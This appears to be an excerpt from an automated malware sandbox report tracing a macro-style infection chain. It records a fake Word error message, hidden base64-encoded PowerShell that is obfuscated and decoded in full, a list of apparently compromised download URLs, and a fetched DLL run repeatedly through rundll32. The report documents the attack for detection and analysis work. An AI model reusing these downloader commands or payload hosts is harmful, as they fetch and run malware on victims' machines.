                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SeT-iTEm ("vARi"+"abLe:0i"+"9f"+"Zb") ( [TYpE]("{1}{2}{4}{5}{0}{3}{6}" -F 'TO','SYSTe','M.Io.di','R','re','C','Y') ) ; $ywM9n =[tYPE]("{5}{0}{3}{2}{4}{1}" -F 'nEt.seRV','eR','InT','iCEPo','maNAG','SYstEM.') ; $S4k6trj=$N69G + [char](33) + $O2_P;$G14Q=('U'+('3'+'6N')); $0I9fzb::"CReat`EDirE`cTORY"($HOME + ((('2ObL'+'i'+'q')+'8l'+'5'+'8'+('2'+'ObEg')+('o'+'k7ei')+('2O'+'b')) -CRepLAcE ([ChAR]50+[ChAR]79+[ChAR]98),[ChAR]92));$O2_Y=(('T'+'35')+'D'); ( gCi VARIAblE:ywm9N ).Value::"SEcur`iTYp`Rot`oCol" = (('Tl'+'s')+'12');$S77N=('A'+('81'+'W'));$Gqh0j_b = ('D'+('6'+'4O'));$W86O=(('C'+'47')+'F');$Mtn05vr=$HOME+(('{0}'+'Liq8l58{0}'+('Eg'+'o')+'k7'+'ei{0}') -f [Char]92)+$Gqh0j_b+'.d' + 'll';$K69W=(('H8'+'9')+'Y');$Tk1qwt9='h' + 'tt' + 'p';$Oylx1dc=(('x ['+' s'+'h')+' b'+':'+'/'+('/n'+'ady')+'s'+('a'+'.c')+'om'+('/'+'w'+'p'+'-conte')+'nt'+'/A'+('lm'+'et')+'/'+'!'+('x'+' [')+(' sh b'+'://b'+'oom'+'ark')+('ete'+'r.'+'co')+('m'+'/w')+('p-c'+'ont'+'e')+'nt'+('/'+'6/')+'!'+('x '+'[ sh')+(' '+'b:')+'//'+('croo'+'k'+'s-taylor')+('.c'+'o')+'m'+'/'+('16'+'76')+'47'+('0973'+'/1/!'+'x')+' ['+' s'+'h'+' '+'b:'+'/'+('/w'+'h'+'ite')+'t'+'he'+('m'+'e.')+'xy'+('z/'+'wp-con'+'t')+('ent/'+'q')+'8H'+('/!x'+' ['+' sh')+(' b'+':')+('//r'+'ex')+('.ta'+'s'+'mir')+('a'+'group.')+('com'+'/')+('w'+'p-')+'in'+('c'+'lud'+'es/un6G/'+'!x ')+('[ '+'sh b:'+'//')+'r'+'ab'+('i'+'ei.')+('fu'+'n/')+'ei'+'dl'+('-recons'+'i'+'d')+'e'+('ra'+'ti')+('on-bs'+'3l'+'u/')+('fe'+'o')+'Oi'+('AO/'+'!')+('x'+' [ s')
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SeT-iTEm ("vARi"+"abLe:0i"+"9f"+"Zb") ( [TYpE]("{1}{2}{4}{5}{0}{3}{6}" -F 'TO','SYSTe','M.Io.di','R','re','C','Y') ) ; $ywM9n =[tYPE]("{5}{0}{3}{2}{4}{1}" -F 'nEt.seRV','eR','InT','iCEPo','maNAG','SYstEM.') ; $S4k6trj=$N69G + [char](33) + $O2_P;$G14Q=('U'+('3'+'6N')); $0I9fzb::"CReat`EDirE`cTORY"($HOME + ((('2ObL'+'i'+'q')+'8l'+'5'+'8'+('2'+'ObEg')+('o'+'k7ei')+('2O'+'b')) -CRepLAcE ([ChAR]50+[ChAR]79+[ChAR]98),[ChAR]92));$O2_Y=(('T'+'35')+'D'); ( gCi VARIAblE:ywm9N ).Value::"SEcur`iTYp`Rot`oCol" = (('Tl'+'s')+'12');$S77N=('A'+('81'+'W'));$Gqh0j_b = ('D'+('6'+'4O'));$W86O=(('C'+'47')+'F');$Mtn05vr=$HOME+(('{0}'+'Liq8l58{0}'+('Eg'+'o')+'k7'+'ei{0}') -f [Char]92)+$Gqh0j_b+'.d' + 'll';$K69W=(('H8'+'9')+'Y');$Tk1qwt9='h' + 'tt' + 'p';$Oylx1dc=(('x ['+' s'+'h')+' b'+':'+'/'+('/n'+'ady')+'s'+('a'+'.c')+'om'+('/'+'w'+'p'+'-conte')+'nt'+'/A'+('lm'+'et')+'/'+'!'+('x'+' [')+(' sh b'+'://b'+'oom'+'ark')+('ete'+'r.'+'co')+('m'+'/w')+('p-c'+'ont'+'e')+'nt'+('/'+'6/')+'!'+('x '+'[ sh')+(' '+'b:')+'//'+('croo'+'k'+'s-taylor')+('.c'+'o')+'m'+'/'+('16'+'76')+'47'+('0973'+'/1/!'+'x')+' ['+' s'+'h'+' '+'b:'+'/'+('/w'+'h'+'ite')+'t'+'he'+('m'+'e.')+'xy'+('z/'+'wp-con'+'t')+('ent/'+'q')+'8H'+('/!x'+' ['+' sh')+(' b'+':')+('//r'+'ex')+('.ta'+'s'+'mir')+('a'+'group.')+('com'+'/')+('w'+'p-')+'in'+('c'+'lud'+'es/un6G/'+'!x ')+('[ '+'sh b:'+'//')+'r'+'ab'+('i'+'ei.')+('fu'+'n/')+'ei'+'dl'+('-recons'+'i'+'d')+'e'+('ra'+'ti')+('on-bs'+'3l'+'u/')+('fe'+'o')+'Oi'+('AO/'+'!')+('x'+' [ s')
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
